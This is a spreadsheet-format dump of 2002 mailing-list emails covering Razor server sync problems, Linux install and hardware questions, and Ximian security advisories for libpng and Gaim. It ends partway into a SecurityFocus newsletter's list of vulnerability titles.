    <t>For the past 2 days, nothing that I'm reporting seems to be in the\ndatabase.  If I report something, and the check the response is coming\nback as none spam.  Is anyone else seeing this?\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: =?iso-8859-1?q?bryan=20roycroft?= &lt;bryanroycroft@yahoo.com.au&gt;\nDate: Tue, 6 Aug 2002 23:19:41 +1000 (EST)</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 23:19:41 +1000 (EST)</t>
  </si>
  <si>
    <t>=?iso-8859-1?q?bryan=20roycroft?= &lt;bryanroycroft@yahoo.com.au&gt;</t>
  </si>
  <si>
    <t>[ILUG] ffs</t>
  </si>
  <si>
    <t>has anyone got information on enabling ffs support in\nthe kernel, i was looking around, and information on\nthe subject seems to be sparse. \n\n[URL]http://digital.yahoo.com.au[/URL] - Yahoo! Digital How To\n- Get the best out of your PC!\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://digital.yahoo.com.au http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "ML-razor-users" &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Tue, 6 Aug 2002 19:03:09 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 19:03:09 -0400</t>
  </si>
  <si>
    <t>If I specify -rs on razor-check and point to honor then it checks fine.\nAlso if I point to apt to report then I get an authentication error so\nis there something wrong with that box?\n\n-----Original Message-----\nFrom: Rose, Bobby \nSent: Tuesday, August 06, 2002 6:54 PM\nTo: ML-razor-users\nSubject: RE: [Razor-users] What's wrong with the Razor servers now?\n\n\nI'm still seeing this.  It reports to honor.cloudmark.com but checks\nagainst apt.cloudmark.com.  What is the sync delay between these boxes?\n\n-----Original Message-----\nFrom: Rose, Bobby \nSent: Monday, August 05, 2002 2:05 PM\nTo: ML-razor-users\nSubject: [Razor-users] What's wrong with the Razor servers now?\n\n\nI noticed a low count of razor'd spam messages. So after digging, if I\nrazor-report a message the diags say that it was accepted but if I turn\naround and run a check on the exact same message that was reported, then\nit doesn't find the sig and as such isn't spam.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL] _______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL] _______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "ML-razor-users" &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Tue, 6 Aug 2002 18:54:04 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 18:54:04 -0400</t>
  </si>
  <si>
    <t>I'm still seeing this.  It reports to honor.cloudmark.com but checks\nagainst apt.cloudmark.com.  What is the sync delay between these boxes?\n\n-----Original Message-----\nFrom: Rose, Bobby \nSent: Monday, August 05, 2002 2:05 PM\nTo: ML-razor-users\nSubject: [Razor-users] What's wrong with the Razor servers now?\n\n\nI noticed a low count of razor'd spam messages. So after digging, if I\nrazor-report a message the diags say that it was accepted but if I turn\naround and run a check on the exact same message that was reported, then\nit doesn't find the sig and as such isn't spam.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL] _______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "'Thor Larholm'" &lt;Thor@jubii.dk&gt;, &lt;nick@virus-l.demon.co.uk&gt;,\nFrom: "Peter Kruse" &lt;kruse@railroad.dk&gt;\nDate: Tue, 6 Aug 2002 18:11:54 +0200</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 18:11:54 +0200</t>
  </si>
  <si>
    <t>"Peter Kruse" &lt;kruse@railroad.dk&gt;</t>
  </si>
  <si>
    <t>"'Thor Larholm'" &lt;Thor@jubii.dk&gt;, &lt;nick@virus-l.demon.co.uk&gt;,</t>
  </si>
  <si>
    <t>SV: More content filtering woes</t>
  </si>
  <si>
    <t>Hi Thor,\n\n[Still trying to catch my breath] :-)\n\nI guess there's no easy way to avoid this. In order to proactively\nprotect endusers they'll need to put such code (or part of it) into\ntheir defs. Since antivirus products still gets smarter and smarter and\nheuristics are getting better and better the odds aginst not running\ninto false positives are poor. Some products will woe plenty of these\nsome are better to avoid the madness (!). I'll leave you to do the test.\nConsider that corporate and endusers are most likely using Microsoft\nsoftware without updating as they should. AV-software is now trying to\nprotect these poor souls adding proxy functionality to catch e.g.\nmalicious content in HTML based e-mails and for a good reason. Looking\nat [URL]http://www.pivx.com[/URL] says it all!  ;-)\n\nMed venlig hilsen // Kind regards\n\nPeter Kruse\nSecurity- and Virusanalyst\nTelia @ Security\n[URL]http://www.teliainternet.dk[/URL]\nMember of AVIEN and FIRST\n\n&gt; -----Oprindelig meddelelse-----\n&gt; Fra: Thor Larholm [mailto:Thor@jubii.dk] \n&gt; Sendt: 5. august 2002 10:13\n&gt; Til: 'nick@virus-l.demon.co.uk'; FOCUS-VIRUS@SECURITYFOCUS.COM\n&gt; Emne: RE: More content filtering woes\n&gt; \n&gt; \n&gt; What I find even more annoying is the horde of false \n&gt; positives that antivirus software constantly yaps one about \n&gt; each time one sends some demonstratory POC to a mailinglist \n&gt; only to have several witless antivirus vendors add ones POC \n&gt; to their virus library, yielding tons of "Quarantined" \n&gt; replies on a daily basis without any added level of security \n&gt; to the enduser whatsoever since any reallife exploitation \n&gt; would yield a completely different signature, thus defeating \n&gt; the purpose of adding ones signature.\n&gt; \n&gt; *phew* That could have used some punctuation. :)\n&gt; \n&gt; \n&gt; \n&gt; \n&gt; Regards\n&gt; Thor Larholm\n&gt; Jubii A/S - Internet Programmer\n&gt;</t>
  </si>
  <si>
    <t>http://www.pivx.com http://www.teliainternet.dk</t>
  </si>
  <si>
    <t>To: Ximian Updates &lt;updates@ximian.com&gt;\nFrom: Ximian GNOME Security Team &lt;distribution@ximian.com&gt;\nDate: Tue, 6 Aug 2002 17:06:12 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 17:06:12 -0400</t>
  </si>
  <si>
    <t>Ximian GNOME Security Team &lt;distribution@ximian.com&gt;</t>
  </si>
  <si>
    <t>Ximian Updates &lt;updates@ximian.com&gt;</t>
  </si>
  <si>
    <t>[Ximian Updates] libpng has a potential buffer overflow when loading progressive images</t>
  </si>
  <si>
    <t>Severity: Security\nProduct: libpng\nKeywords: Red Carpet libpng buffer overflow\nURL: [URL]http://support.ximian.com[/URL]\nReferences: \nRelease Notes for libpng \nftp://swrinde.nde.swri.edu/pub/png-group/archives/png-list.200207\n\nlibpng is a library used to create and manipulate PNG (Portable\nNetwork Graphics) image files.\n\nThe 1.2.4* and 1.0.14 releases of libpng solve a potential buffer\noverflow vulnerability[1] in some functions related to progressive\nimage loading. Programs such as mozilla and various others use these\nfunctions. An attacker could exploit this to remotely run arbitrary\ncode or crash an application by using a specially crafted png image.\n\nThese new releases also solve other minor bugs such as some memory\nleaks in reading image functions.\n\nSince most applications which display images use libpng, this affects\nmany applications including Evolution and Mozilla. Additionally, Red\nCarpet links libpng statically and needs to be updated separately.\n\nXimian only ships libpng on Solaris, and so we only have Solaris\npackages available. When distribution vendors update their packages,\nthey will be available in Red Carpet. Please use Red Carpet to upgrade\nlibpng to 1.0.14 and Red Carpet 1.3.4-2. You can also get packages\nfrom the Ximian FTP site:\n\nSolaris 7/8\nftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/libpng-1.0.14-1.ximian.1.sparc.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/libpng-devel-1.0.14-1.ximian.1.sparc.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/red-carpet-1.3.4-2.ximian.1.sparc.rpm\n\n\n\n_______________________________________________\nupdates maillist  -  updates@ximian.com\n[URL]http://lists.ximian.com[/URL]\nPlease DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.</t>
  </si>
  <si>
    <t>http://support.ximian.com http://lists.ximian.com</t>
  </si>
  <si>
    <t>To: Ximian Updates &lt;updates@ximian.com&gt;\nFrom: Ximian GNOME Security Team &lt;distribution@ximian.com&gt;\nDate: Tue, 6 Aug 2002 17:03:18 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 17:03:18 -0400</t>
  </si>
  <si>
    <t>[Ximian Updates] Ximian Security Updates</t>
  </si>
  <si>
    <t>The Ximian Security Team has been issuing advisories for security \nproblems in Ximian GNOME for some time now at this URL:\n\n[URL]http://support.ximian.com[/URL]\n\nStarting today we will begin to also email security advisories to\nthis list (updates@ximian.com) to raise the awareness of potential \nproblems.\n\nThe Ximian Security Team\n\n\n_______________________________________________\nupdates maillist  -  updates@ximian.com\n[URL]http://lists.ximian.com[/URL]\nPlease DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.</t>
  </si>
  <si>
    <t>To: "Albert White - SUN Ireland"\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Tue, 6 Aug 2002 15:58:19 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 15:58:19 +0100</t>
  </si>
  <si>
    <t>"Matthew French" &lt;mfrench42@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>"Albert White - SUN Ireland"</t>
  </si>
  <si>
    <t>Re: [ILUG] Sparc Solaris (was: Dell GX260 V Redhat 7.3)</t>
  </si>
  <si>
    <t>BAD MSG:\n\n &gt; And you get a working version of your favourite KDE/Gnome desktop\n&gt; &gt; instead of DTE, uhm, I mean CDE.\n&gt;\n&gt; um.. [URL]http://wwws.sun.com[/URL] integrated into solaris.\n\nYeah yeah yeah. I tried it (over a year ago) and it sucked like a new vacuum\ncleaner. Although I expect that it will be a lot better by now. What I would\nreally like to see is Gnome on one of the Sun Ray thin terminals.\n\n&gt; Out of curiosity, does `normal fashion` mean that you still have to do the\n&gt; interactive customisations or is it like Solaris jumpstart where you can\n&gt; specify everything on the install server, do `boot net - install` go home,\nand\n&gt; come in to a fully installed and patched desktop the next morning?\n\nEr, I mean normal fashion for a Linux install. This would be distro\nspecific, anyway.\n\nI am sure it would be possible to do an automated install with a few script\nchanges. I would not be surprised if Debian does this already.\n\nI do know that if you pass extra parameters on the boot command, they are\npicked up by silo. So:\n  boot disk linux\n\nwould not prompt for selection but would boot straight through. From there\nit is a matter of tftp'ing the correct config file and the install would be\nautomatic from there on.\n\n&gt; I don't see why this should be a _major problem. The prom (ie the "ok"\n&gt; prompt)\n&gt; is almost at the hardware level and hence dosent depend on the os so you\n&gt; should be able to connect to that easily enough. Once the machine is\ninstalled\n&gt; cant you just log in over the network? The network is the computer after\nall\n&gt; (sorry couldn't resist!)\n\nThe problem is that the time between linux booting and when the console tty\ndrivers are started can be a black hole, without error messages or log in\nprompts. The other problem is that sometimes Linux will drop in to the PROM\non shutdown instead of powering off or rebooting. Without a serial cable or\nkeyboard it is not possible to reboot the box without flicking the power\nswitch hidden at the back of the case.\n\nI think if the console is ttya/ttyS0 it will drop into PROM. If it is\n/dev/null then you do not get console messages but the box will shut down\nproperly.\n\n- Matthew\n\n\n__________________________________________________\nDo You Yahoo!?\nEverything you'll ever need on one web page\nfrom News and Sport to Email and Music Charts\n[URL]http://uk.my.yahoo.com[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://wwws.sun.com http://uk.my.yahoo.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: distribution@ximian.com\nDate: Tue, 6 Aug 2002 15:41:23 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 15:41:23 -0400</t>
  </si>
  <si>
    <t>distribution@ximian.com</t>
  </si>
  <si>
    <t>undisclosed-recipients:;</t>
  </si>
  <si>
    <t>[Ximian Updates] (no subject)</t>
  </si>
  <si>
    <t>CAN-2002-0384  [URL]http://cve.mitre.org[/URL]\nRHSA-2002-098  [URL]http://rhn.redhat.com[/URL]\nGaim Changelog [URL]http://gaim.sourceforge.net[/URL]\n\nGaim is an instant messaging client based on the published TOC\nprotocol from AOL. Versions of Gaim prior to 0.58 contain a buffer\noverflow in the Jabber plug-in module.\n\nPlease download Gaim 0.59 or later using Red Carpet. You may also\nobtain this update from the Ximian FTP site.\n\nDebian Potato\nftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim_0.59-1.ximian.1_i386.deb\nftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-common_0.59-1.ximian.1_i386.deb\nftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-gnome_0.59-1.ximian.1_i386.deb\n\nMandrake 8.0\nftp://ftp.ximian.com/pub/ximian-gnome/mandrake-80-i586/gaim-0.59-1.ximian.1.i586.rpm\n\nMandrake 8.1\nftp://ftp.ximian.com/pub/ximian-gnome/mandrake-81-i586/gaim-0.59-1.ximian.1.i586.rpm\n\nMandrake 8.2\nftp://ftp.ximian.com/pub/ximian-gnome/mandrake-82-i586/gaim-0.59-1.ximian.1.i586.rpm\n\nRedhat 6.2\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nRedhat 7.0\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nRedhat 7.1\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nRedhat 7.2\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nRedhat 7.3\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nSolaris 7/8\nftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/gaim-0.59-1.ximian.1.sparc.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/gaim-applet-0.59-1.ximian.1.sparc.rpm\n\nSuSE 7.1\nftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nSuSE 7.2\nftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nSuSE 7.3\nftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nSuSE 8.0\nftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-0.59-1.ximian.1.i386.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-applet-0.59-1.ximian.1.i386.rpm\n\nYellowdog 2.0\nftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-0.59-1.ximian.1.ppc.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-applet-0.59-1.ximian.1.ppc.rpm\n\nYellowdog 2.1\nftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-0.59-1.ximian.1.ppc.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-applet-0.59-1.ximian.1.ppc.rpm\n\nYellowdog 2.2\nftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-0.59-1.ximian.1.ppc.rpm\nftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-applet-0.59-1.ximian.1.ppc.rpm\n\n\n\n_______________________________________________\nupdates maillist  -  updates@ximian.com\n[URL]http://lists.ximian.com[/URL]\nPlease DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.</t>
  </si>
  <si>
    <t>http://cve.mitre.org http://rhn.redhat.com http://gaim.sourceforge.net http://lists.ximian.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: kevin lyda &lt;kevin+dated+1029071609.d28773@ie.suberic.net&gt;\nDate: Tue, 6 Aug 2002 14:13:27 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 14:13:27 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029071609.d28773@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 06, 2002 at 02:04:11PM +0100, Niall Brady wrote:\n&gt; &gt;(guess who inspired them?).  pc hardware is dumb, so you'll need to use\n&gt; &gt;a floppy.  otoh, every jumpstart config i've seen required rarp plus\n&gt; &gt;plugging the new box's ethernet+ip into a file.  a kickstart boot can\n&gt; &gt;just use a dhcp server.\n&gt; Aye, but it'll still need a /boot/kickstart/$VER/$IP-kickstart won't it\n&gt; to proceed automatically?  [or am I completely off track there?]\n\nit's been a while since i did a kickstart install.  my memory is that\nyou put a file on a standard redhat boot disk that essentially scripts\nthe install.  there are a slew of options - you can have it fetch it's\ninstall script from a tftpd server for instance (similar to jumpstart),\nor it can all be on the floppy.\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ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Tue, 6 Aug 2002 14:03:07 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 14:03:07 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] 3c509 &amp; 2.4.19 problems - SUMMARY</t>
  </si>
  <si>
    <t>&gt; It works fine now that the sound card is removed, but I'm still confused &gt; as to &gt; why this worked in 2.2.18 but not 2.4.19, seems like a regression to me... &gt;  &gt; Thanks again, &gt;  &gt; Cheers, &gt; ~Al Strange. I had the double IRQ problem with the 3c509 combo,  and turning pnp off in the card's firware fixed it. As far as I remember the problem I was having was  that the driver was assigning an IRQ to the card's  RJ45 port and then another IRQ to it's BNC port,  and then referenced the card via the second assigned irq,  and turning off PnP in the card's firmware fixed that. You must be having a different error Else PnP is still turned on. &lt;&gt; Making sure the IRQ and io space you assign the card in it's firmware is not in use by any other ISA devices. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 6 Aug 2002 13:30:23 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 13:30:23 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 06, 2002 at 01:22:07PM +0100, Anders Holm mentioned:\n&gt; &gt; Heh, how hard would it be to get a PC with an OpenBoot prom ?\n&gt; \n&gt; You could burn a PROM yourself, if you'd wish. I believe that the netboot \n&gt; project would have a PROM you could download and burn, having the needed \n&gt; h/w of course.. ;)\n\n But the PROMs are for specific network cards, and all their are really is\na bootp/tftp client. Not the whole set of nice bits &amp; pieces you get with\nan OpenBoot PROM.\n\n AMD were talking of supporting it ages back, when the Athlon was looking\nlike it would just be on workstations from day one. They seemed to drop\nit, and go for the crappy MSDOS compatible BIOS though.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 6 Aug 2002 13:06:57 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 13:06:57 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 06, 2002 at 12:56:17PM +0100, kevin lyda mentioned:\n&gt; sorry, i missed this.  redhat supplies something similar called kickstart\n&gt; (guess who inspired them?).  pc hardware is dumb, so you'll need to use\n&gt; a floppy.  otoh, every jumpstart config i've seen required rarp plus\n&gt; plugging the new box's ethernet+ip into a file.  a kickstart boot can\n&gt; just use a dhcp server.\n\n I've just been re-aquainted with the Jumpstart stuff after a long\nabsence.\n\n There is a nice need 'add_install_client' script that you feed the\narchtecture, ethernet address &amp; ip to, and it'll setup everything from\nRARP to Bootparams for you. Very simple.\n\n This script takes a -d option, to boot via DHCP also. On the negative\nside, Sun's terminal handling leaves a lot to be desired - it won't work\nproperly on a Wyse 120+ for instance, no matter what emulation mode the\nWyse is trying to do.\n\n To do PC netbooting properly, you need an motherbard with a PXE BIOS.\nThen you are flying.\n\n Heh, how hard would it be to get a PC with an OpenBoot prom ?\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Matthew French &lt;mfrench42@yahoo.co.uk&gt;\nFrom: kevin lyda &lt;kevin+dated+1029066979.c30bc3@ie.suberic.net&gt;\nDate: Tue, 6 Aug 2002 12:56:17 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 12:56:17 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029066979.c30bc3@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>Matthew French &lt;mfrench42@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 06, 2002 at 09:46:27AM +0100, Matthew French wrote:\n&gt; Declan Houlihan mentioned:\n&gt; &gt; We're actually investigating switching from Sparc/Solaris to\n&gt; &gt; Intel/Linux.\n&gt; \n&gt; And then:\n&gt; &gt; At the moment at work, if we want a new workstation, we just\n&gt; &gt; buy whatever Sun's latest system is, we jumpstart it, and\n&gt; &gt; that's it, it's up and running.\n\nsorry, i missed this.  redhat supplies something similar called kickstart\n(guess who inspired them?).  pc hardware is dumb, so you'll need to use\na floppy.  otoh, every jumpstart config i've seen required rarp plus\nplugging the new box's ethernet+ip into a file.  a kickstart boot can\njust use a dhcp server.\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ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Ilug (E-mail)" &lt;ilug@linux.ie&gt;\nFrom: "Hunt, Bryan" &lt;B.Hunt@emuse-tech.com&gt;\nDate: Tue, 6 Aug 2002 10:15:58 +0100</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 10:15:58 +0100</t>
  </si>
  <si>
    <t>"Ilug (E-mail)" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] nmblookup question</t>
  </si>
  <si>
    <t>Hello all,\nI'm trying to get wins name resolution across subnets working and reckon the\nfirst step is to be \nable to do a nmblookup without using the -B (broadcast address flag). Does\nanyone know how \nsamba can be configured to do broadcasts to subnets other than just the\nlocal subnet. \nI don't think this has anything to do with the remote announce parameter.\n\nThanks\nBryan\n\n\n"And the smoke of their torment ascendeth up for ever and ever: and they\nhave no rest day nor night, \nwho worship the beast and his image, and whosoever receiveth the mark of his\nname."\n(Revelation 14:11)\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: linux-secnews@securityfocus.com\nFrom: John Boletta &lt;jboletta@securityfocus.com&gt;\nDate: Tue, 6 Aug 2002 10:03:52 -0600 (MDT)</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 10:03:52 -0600 (MDT)</t>
  </si>
  <si>
    <t>John Boletta &lt;jboletta@securityfocus.com&gt;</t>
  </si>
  <si>
    <t>linux-secnews@securityfocus.com</t>
  </si>
  <si>
    <t>SecurityFocus Linux Newsletter #92</t>
  </si>
  <si>
    <t>SecurityFocus Linux Newsletter #92\n----------------------------------\n\nThis newsletter is sponsored by: SecurityFocus DeepSight Threat Management\nSystem\n\n&gt;&gt;From June 24th - August 31st, 2002, SecurityFocus announces a FREE\ntwo-week trial of the DeepSight Threat Management System: the only early\nwarning system providing customizable and comprehensive early warning of\ncyber attacks and bulletproof countermeasures to prevent attacks before\nthey hit your network.\n\nWith the DeepSight Threat Management System, you can focus on proactively\ndeploying prioritized and specific patches to protect your systems from\nattacks, rather than reactively searching dozens of Web sites or hundreds\nof emails frantically trying to gather information on the attack and how\nto recover from it.\n\nSign up today!\n[URL]http://www.securityfocus.com[/URL]\n-------------------------------------------------------------------------------\n\nI. FRONT AND CENTER\n     1. Advanced Log Processing\n     2. Assessing Internet Security Risk, Part Three: an Internet...\n     3. Copyright, Security, and the Hollywood Hacking Bill\n     4. SecurityFocus DPP Program\nII. LINUX VULNERABILITY SUMMARY\n     1. OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow...\n     2. Abyss Web Server HTTP GET Request Directory Contents Disclosure...\n     3. DotProject User Cookie Authentication Bypass Vulnerability\n     4. OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability\n     5. phpBB2 Gender Mod Remote SQL Injection Vulnerability\n     6. ShoutBox Form Field HTML Injection Vulnerability\n     7. Sympoll File Disclosure Vulnerability\n     8. OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability\n     9. William Deich Super SysLog Format String Vulnerability\n     10. Frederic Tyndiuk Eupload Plain Text Password Storage...\n     11. Util-linux File Locking Race Condition Vulnerability\n     12. OpenSSL Kerberos Enabled SSLv3 Master Key Exchange Buffer...\n     13. OpenSSL ASCII Representation Of Integers Buffer Overflow...\n     14. ParaChat Phantom User Denial Of Service Vulnerability\n     15. OpenSSH Trojan Horse Vulnerability\n     16. Bharat Mediratta Gallery Remote File Include Vulnerability\n     17. John G. Myers MUnpack Malformed MIME Encoded Message Buffer...\n     18. Dispair Remote Command Execution Vulnerability\n     19. Mailreader Session Hijacking Vulnerability\n     20. John G. Myers MPack/MUnpack Malformed Filename Vulnerability\n     21. Fake Identd Client Query Remote Buffer Overflow Vulnerability\nIII. LINUX FOCUS LIST SUMMARY\n     1. LDAP Auth? (Thread)\n     2. LDAP auth (Thread)\n     3. Administrivia: Gone Fishin' (Thread)\nIV. NEW PRODUCTS FOR LINUX PLATFORMS\n     1. Gateway Guardian\n     2. PakSecured Linux\n     3. Progressive Systems VPN\nV. NEW TOOLS FOR LINUX PLATFORMS\n     1. Astaro Security Linux (Stable 3.x) v3.202\n     2. FCheck 2.07.59\n     3. The @stake Sleuth Kit (TASK) v1.50\nVI. SPONSORSHIP INFORMATION\n\n\nI. FRONT AND CENTER\n-------------------\n1. Advanced Log Processing\nBy Anton Chuvakin\n\nReading logs is a crucial part of incident detection and response.\nHowever, it is easy for security personnel to be overwhelmed by the sheer\nvolume of logs. This article will offer a brief overview of log analysis,\nparticularly: log transmission, log collection and log analysis. It will\nalso briefly touch upon log storing and archival.\n\n[URL]http://online.securityfocus.com[/URL]\n\n2.  Assessing Internet Security Risk, Part Three: an Internet Assessment\nMethodology Continued\nby Charl van der Walt\n\nThis article is the third in a series that is designed to help readers to\nassess the risk that their Internet-connected systems are exposed to. In\nthe first installment, we established the reasons for doing a technical\nrisk assessment. In the second part, we started to discuss the methodology\nthat we follow in performing this kind of assessment. In this installment,\nwe will continue to discuss methodology, particularly visibility and\nvulnerability scanning.\n\n[URL]http://online.securityfocus.com[/URL]\n\n3. Copyright, Security, and the Hollywood Hacking Bill\nBy Richard Forno\n\nProposed copyright 